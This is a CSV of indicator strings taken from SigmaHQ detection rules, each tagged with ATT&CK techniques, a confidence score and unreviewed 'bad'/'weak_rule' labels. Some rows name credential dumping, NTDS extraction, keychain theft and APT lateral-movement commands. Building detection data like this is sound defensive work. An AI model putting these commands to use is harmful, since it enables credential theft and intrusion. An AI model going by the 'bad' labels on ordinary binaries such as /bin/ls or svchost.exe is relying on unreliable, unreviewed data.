ffc3e60e8f6801f86d1a1b86,--dump-hash-local,--dump-hash-local,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml,HackTool - Quarks PwDump Execution,process_creation,"[""attack.credential-access"", ""attack.t1003.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 71f822717326cb38f1bf4569,--ntds-file,--ntds-file,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml,HackTool - Quarks PwDump Execution,process_creation,"[""attack.credential-access"", ""attack.t1003.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2b35364a897216deeaa6b2ef,AdFind.exe,AdFind.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_adfind.yml,Renamed AdFind Execution,process_creation,"[""attack.discovery"", ""attack.t1018"", ""attack.t1087.002"", ""attack.t1482"", ""attack.t1069.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d5a6f5f05db9ec22ac3a7576,mavinject32.exe,mavinject32.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml,Renamed Mavinject.EXE Execution,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055.001"", ""attack.t1218.013""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 28159f1a17531d4f92272b13,mavinject64.exe,mavinject64.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml,Renamed Mavinject.EXE Execution,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055.001"", ""attack.t1218.013""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 84c0abb49871fd64b599b521,C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe,C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_schtasks_creation.yml,Scheduled Task Creation Via Schtasks.EXE,process_creation,"[""attack.execution"", ""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1053.005"", ""attack.s0111"", ""car.2013-08-001"", ""stp.1u""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 739261de6d53ab7688a136b6,C:\Program Files\Microsoft Office\root\integration\integrator.exe,C:\Program Files\Microsoft Office\root\integration\integrator.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_schtasks_creation.yml,Scheduled Task Creation Via Schtasks.EXE,process_creation,"[""attack.execution"", ""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1053.005"", ""attack.s0111"", ""car.2013-08-001"", ""stp.1u""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 753b11d08d87f90829483037,C:\Windows\SysWOW64\schtasks.exe,C:\Windows\SysWOW64\schtasks.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_schtasks_creation.yml,Scheduled Task Creation Via Schtasks.EXE,process_creation,"[""attack.execution"", ""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1053.005"", ""attack.s0111"", ""car.2013-08-001"", ""stp.1u""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b07746f3bde99c20b0241f79,C:\Windows\System32\schtasks.exe,C:\Windows\System32\schtasks.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_schtasks_creation.yml,Scheduled Task Creation Via Schtasks.EXE,process_creation,"[""attack.execution"", ""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1053.005"", ""attack.s0111"", ""car.2013-08-001"", ""stp.1u""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1e7c3d16a8eda696e91f17b8,C:\WINDOWS\system32\wbem\scrcons.exe,C:\WINDOWS\system32\wbem\scrcons.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,WMI Persistence - Script Event Consumer,process_creation,"[""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1546.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 281763600c2e390f9717ed0f,C:\Windows\System32\svchost.exe,C:\Windows\System32\svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,WMI Persistence - Script Event Consumer,process_creation,"[""attack.persistence"", ""attack.privilege-escalation"", ""attack.t1546.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 261f0c72862be59b0c4d9243,sdelete.exe,sdelete.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml,Renamed Sysinternals Sdelete Execution,process_creation,"[""attack.impact"", ""attack.t1485""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8845ac7c10575fa2de50991c,C:\Windows\SysWOW64\msiexec.exe,C:\Windows\SysWOW64\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml,Suspicious Eventlog Clearing or Configuration Change Activity,process_creation,"[""attack.defense-evasion"", ""attack.t1070.001"", ""attack.t1562.002"", ""car.2016-04-002""]",windows,0.7,True,Sigma process_creation rule; status=stable; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d150c04b01b2182444b22209,C:\Windows\System32\msiexec.exe,C:\Windows\System32\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml,Suspicious Eventlog Clearing or Configuration Change Activity,process_creation,"[""attack.defense-evasion"", ""attack.t1070.001"", ""attack.t1562.002"", ""car.2016-04-002""]",windows,0.7,True,Sigma process_creation rule; status=stable; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e3d032b2511468a8e45ddfb0,C:\Windows\System32\OpenSSH\sshd.exe,C:\Windows\System32\OpenSSH\sshd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml,Program Executed Using Proxy/Local Command Via SSH.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4240fd5eef193edce794e066,svchost.exe,svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_svchost_uncommon_command_line_flags.yml,Uncommon Svchost Command Line Parameter,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1036.005"", ""attack.t1055"", ""attack.t1055.012""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a19a9c5566568684cc7f6b62,/usr/bin/defaults,/usr/bin/defaults,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml,System Network Discovery - macOS,process_creation,"[""attack.discovery"", ""attack.t1016""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bb95d79530defe61e5ddce0c,/bin/ls,/bin/ls,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml,File and Directory Discovery - MacOS,process_creation,"[""attack.discovery"", ""attack.t1083""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c240a84bac1372bea1ec9dbf,/tree,/tree,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml,File and Directory Discovery - MacOS,process_creation,"[""attack.discovery"", ""attack.t1083""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f83395fd59ebd39c25feebd1,/usr/bin/file,/usr/bin/file,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml,File and Directory Discovery - MacOS,process_creation,"[""attack.discovery"", ""attack.t1083""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1954229a28e0e268b93935c2,/usr/bin/find,/usr/bin/find,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml,File and Directory Discovery - MacOS,process_creation,"[""attack.discovery"", ""attack.t1083""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9766d2c9066cb6423477326b,/usr/bin/mdfind,/usr/bin/mdfind,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml,File and Directory Discovery - MacOS,process_creation,"[""attack.discovery"", ""attack.t1083""]",macos,0.7,True,Sigma process_creation rule; status=test; level=informational,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 93891947588ca503dcefbca3,/usr/sbin/screencapture,/usr/sbin/screencapture,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_screencapture.yml,Screen Capture - macOS,process_creation,"[""attack.collection"", ""attack.t1113""]",macos,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 32a8d63d96899481f2ed8695,/usr/bin/base64,/usr/bin/base64,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_base64_decode.yml,Decode Base64 Encoded Text -MacOs,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",macos,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4827bf44db5aa234f2bc55e9,/usr/bin/grep,/usr/bin/grep,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml,Security Software Discovery - MacOs,process_creation,"[""attack.discovery"", ""attack.t1518.001""]",macos,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0bb0150637cbb90a0a727248,/usr/bin/security,/usr/bin/security,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml,Credentials from Password Stores - Keychain,process_creation,"[""attack.credential-access"", ""attack.t1555.001""]",macos,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 60258016f0dd3bfed55c1609,/usr/sbin/firmwarepasswd,/usr/sbin/firmwarepasswd,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml,Suspicious MacOS Firmware Activity,process_creation,"[""attack.impact""]",macos,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 17d50e02c1e3108f66fd8cb5,/bin/launchctl,/bin/launchctl,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml,Disable Security Tools,process_creation,"[""attack.defense-evasion"", ""attack.t1562.001""]",macos,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 192146bd64a75ab64a2c86d0,/usr/sbin/spctl,/usr/sbin/spctl,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml,Disable Security Tools,process_creation,"[""attack.defense-evasion"", ""attack.t1562.001""]",macos,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f3cb97810b9cbe4ebd8840e6,/bin/dd,/bin/dd,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml,DD File Overwrite,process_creation,"[""attack.impact"", ""attack.t1485""]",linux,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f2d8bff8327361c7ea36eb4c,/usr/bin/dd,/usr/bin/dd,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml,DD File Overwrite,process_creation,"[""attack.impact"", ""attack.t1485""]",linux,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review be5861f8937c31fb60bd77cd,bash -i,bash -i,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml,Interactive Bash Suspicious Children,process_creation,"[""attack.execution"", ""attack.defense-evasion"", ""attack.t1059.004"", ""attack.t1036""]",linux,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5eedca35dc913ce8a80af069,C:\Windows\System32\svchost.exe,C:\Windows\System32\svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml,Potential CVE-2022-26809 Exploitation Attempt,process_creation,"[""attack.initial-access"", ""attack.t1190"", ""attack.execution"", ""attack.t1569.002"", ""cve.2022-26809"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 212ccaf8a17e45c3072cae7a,C:\ProgramData\DRM\CLR\CLR.exe,C:\ProgramData\DRM\CLR\CLR.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml,Winnti Malware HK University Campaign,process_creation,"[""attack.privilege-escalation"", ""attack.persistence"", ""attack.defense-evasion"", ""attack.t1574.001"", ""attack.g0044"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a0b273e67c748c1dc8c587cd,C:\Windows\MsMpEng.exe,C:\Windows\MsMpEng.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml,REvil Kaseya Incident Malware Patterns,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.g0115"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 81dc63d98ab3b5dda5a6d516,C:\Windows\cert.exe,C:\Windows\cert.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml,REvil Kaseya Incident Malware Patterns,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.g0115"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a2037033c4c71db756498018,C:\kworking1\agent.exe,C:\kworking1\agent.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml,REvil Kaseya Incident Malware Patterns,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.g0115"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2b9eac6f8955b89b6dd0a201,C:\kworking\agent.exe,C:\kworking\agent.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml,REvil Kaseya Incident Malware Patterns,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.g0115"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0fd6ed4863dcce94cdd7e586,jpinst.exe,jpinst.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml,Potential SNAKE Malware Installation Binary Indicator,process_creation,"[""attack.execution"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b1cbe0f19d5b9c4f22e12d2e,jpsetup.exe,jpsetup.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml,Potential SNAKE Malware Installation Binary Indicator,process_creation,"[""attack.execution"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4516d3cce9f8f59bf8c0e0b7,ipconfig.exe /all,ipconfig.exe /all,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_discovery.yml,Potential Pikabot Discovery Activity,process_creation,"[""attack.discovery"", ""attack.t1016"", ""attack.t1049"", ""attack.t1087"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b5975e5b3e38feff08acda1e,netstat.exe -aon,netstat.exe -aon,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_discovery.yml,Potential Pikabot Discovery Activity,process_creation,"[""attack.discovery"", ""attack.t1016"", ""attack.t1049"", ""attack.t1087"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df47d5959c7067ea3795fabc,whoami.exe /all,whoami.exe /all,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_discovery.yml,Potential Pikabot Discovery Activity,process_creation,"[""attack.discovery"", ""attack.t1016"", ""attack.t1049"", ""attack.t1087"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review acf0e48ebb0fad085586888d,Cmd.Exe,Cmd.Exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml,Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution,process_creation,"[""attack.execution"", ""cve.2023-36874"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b6e8e6cf599a0f855c4113ff,powershell.exe,powershell.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml,Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution,process_creation,"[""attack.execution"", ""cve.2023-36874"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 318ab93febe09ac881182654,powershell_ise.EXE,powershell_ise.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml,Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution,process_creation,"[""attack.execution"", ""cve.2023-36874"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 164d334613accabb82dcc7b6,C:\Windows\SysWOW64\regsvr32.exe,C:\Windows\SysWOW64\regsvr32.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2025/Exploits/CVE-2025-49144/proc_creation_win_exploit_cve_2025_49144.yml,Potential Notepad++ CVE-2025-49144 Exploitation,process_creation,"[""attack.persistence"", ""attack.privilege-escalation"", ""attack.defense-evasion"", ""attack.t1574.008"", ""cve.2025-49144"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 62007ec05bf4202f6be03cbc,C:\Windows\System32\regsvr32.exe,C:\Windows\System32\regsvr32.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2025/Exploits/CVE-2025-49144/proc_creation_win_exploit_cve_2025_49144.yml,Potential Notepad++ CVE-2025-49144 Exploitation,process_creation,"[""attack.persistence"", ""attack.privilege-escalation"", ""attack.defense-evasion"", ""attack.t1574.008"", ""cve.2025-49144"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d4b09f4a04ea8db926f4f041,C:\Program Files\internet explorer\iediagcmd.exe,C:\Program Files\internet explorer\iediagcmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_creation_win_exploit_cve_2025_33053.yml,Potential Exploitation of RCE Vulnerability CVE-2025-33053,process_creation,"[""attack.command-and-control"", ""attack.execution"", ""attack.defense-evasion"", ""attack.t1218"", ""attack.lateral-movement"", ""attack.t1105"", ""detection.emerging-threats"", ""cve.2025-33053""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d03b0371782891b907fd5386,C:\Windows\System32\CustomShellHost.exe,C:\Windows\System32\CustomShellHost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_creation_win_exploit_cve_2025_33053.yml,Potential Exploitation of RCE Vulnerability CVE-2025-33053,process_creation,"[""attack.command-and-control"", ""attack.execution"", ""attack.defense-evasion"", ""attack.t1218"", ""attack.lateral-movement"", ""attack.t1105"", ""detection.emerging-threats"", ""cve.2025-33053""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1092a18a1b64d072bdae3402,dir %TEMP%\\*.exe,dir %TEMP%\\*.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml,Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral-movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fc6c17a7ff4522cfb18670d0,dir c:\\*.doc* /s,dir c:\\*.doc* /s,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml,Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral-movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 26deb62475a58fdc6f423328,"net use \\\\%DomainController%\C$ ""P@ssw0rd"" *","net use \\\\%DomainController%\C$ ""P@ssw0rd"" *",bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml,Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral-movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f10c8cd749c4a68e1a61bd82,PowerShell.EXE,PowerShell.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2026/Malware/Axios-NPM-Compromise/proc_creation_win_axios_npm_compromise_indicators.yml,Axios NPM Compromise Indicators - Windows,process_creation,"[""attack.initial-access"", ""attack.t1195.002"", ""attack.execution"", ""attack.command-and-control"", ""attack.defense-evasion"", ""attack.t1059.003"", ""attack.t1059.005"", ""attack.t1105"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=experimental; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a3f2fea6b01aa7e9dd5ab4ae,C:\Windows\system32\Service.exe,C:\Windows\system32\Service.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml,OilRig APT Activity,process_creation,"[""attack.privilege-escalation"", ""attack.execution"", ""attack.persistence"", ""attack.g0049"", ""attack.t1053.005"", ""attack.s0111"", ""attack.t1543.003"", ""attack.defense-evasion"", ""attack.t1112"", ""attack.command-and-control"", ""attack.t1071.004"", ""detection.emerging-threats""]",windows,0.7,True,Sigma process_creation rule; status=test; level=critical,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 46481fd2e5593563c5cd334c,sc query dokan1,sc query dokan1,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_sc_query.yml,SC.EXE Query Execution,process_creation,"[""attack.discovery"", ""attack.t1007"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d85ea7ba31d046f02598536c,sc.exe,sc.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_sc_query.yml,SC.EXE Query Execution,process_creation,"[""attack.discovery"", ""attack.t1007"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4056ef6c785791cdb1567e33,regsvr32 /s rpcproxy.dll,regsvr32 /s rpcproxy.dll,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml,Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly,process_creation,"[""attack.defense-evasion"", ""attack.t1218"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 